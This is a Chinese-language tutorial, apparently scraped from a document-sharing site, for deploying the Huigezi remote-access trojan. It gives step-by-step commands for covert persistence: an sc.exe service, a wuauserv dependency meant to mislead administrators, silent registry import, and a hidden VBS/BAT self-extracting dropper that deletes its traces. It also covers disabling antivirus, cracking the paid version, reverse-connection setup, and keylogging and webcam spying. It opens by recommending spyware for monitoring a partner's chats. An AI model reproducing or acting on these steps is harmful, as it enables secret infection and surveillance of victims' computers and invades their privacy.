- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
灰鸽子使用教程+网络人远程控制软件教程(图解)写在前面:现在灰鸽子是越来越困难了,查杀太严重,新手基本上很难捉到鸡,建议如果只是想监控男女朋友QQ聊天记录的新手,直接购买网络人远程控制软件软件,非常好用的一款监控软件,免杀做得很好,鸽子其实不是免费的,空间也是收费的。
没必要浪费时间)灰鸽子教程准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BA T文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
里面写上如下代码:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。
八仙过海....7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs当然解压模式依旧全部隐藏,替换同名文件现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机这个方法可以用到其他的木马中捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"灰鸽子第一章:软件相关介绍:灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2019。
11.软件附带有四款实用工具:a. EXE工具: 可以修改任何EXE文件图标,支持真彩色!b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使你在局域网内部也能使用自动上线功能!c. FTP服务器: 可以开本机FTP服务!d. Web服务器: 可以建立一个简单的Web服务器!12.服务端程序在Windows 2000 / xp / 2019 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!功能简单介绍:【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!【5】telnet(超级终端).【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线!【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!注册灰鸽子软件后享有:⒈享用软件的所有功能,没有任何限制!⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!⒊可以使用我们的专用上线系统,无需其它域名和空间支持!⒋得到我们更好的技术服务!注:[VIP版] 包括VIP2019、Version 1.2、Version 2.0 ![企业版]用户只能使用企业版!不能使用其它版本!5.加入会员后,会自动加入官方论坛。
享受官方技术支持灰鸽子第二章:好马配好鞍,服务端正确配置。
灰鸽子是一款要交钱的软件,也就是说,你使用VIP版的话是要交给作者每年几十块钱的使用费(不作任何评论)因此网上也就有很多高手破解灰鸽子,让灰鸽子可以不用到灰鸽子的官方网站进行验证,从而可以不用交钱就可以使用,相关版本有:影子鹰破解专用版,爱儿破解版,以及华夏黑客联盟的灰鸽子sunray破解版。
今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方式,只可实验,不可做坏事,大家不喜欢请跳过这一章。
第一节:未雨绸缪,实验准备。
第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控开着的话肯定会被删除的。
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。
(这一点,等一下会详细解说)第二节:实战开始。
把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。
解压的文件里面有以下几个文件:H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客户端。
http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来在本机子上建一个服务器,骗过软件的,从而达到破解的目的。
sunray.exe 这个里面其实也就只是一个host,它把http://huigezi这个网站的域名本地解析到本机,而不是解析到官方网站。
vip_2019_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会下载这一个到客户端,用来验证用的。
其它的文件还有config2019.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。
应该是配置用的。
第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和你取得连接。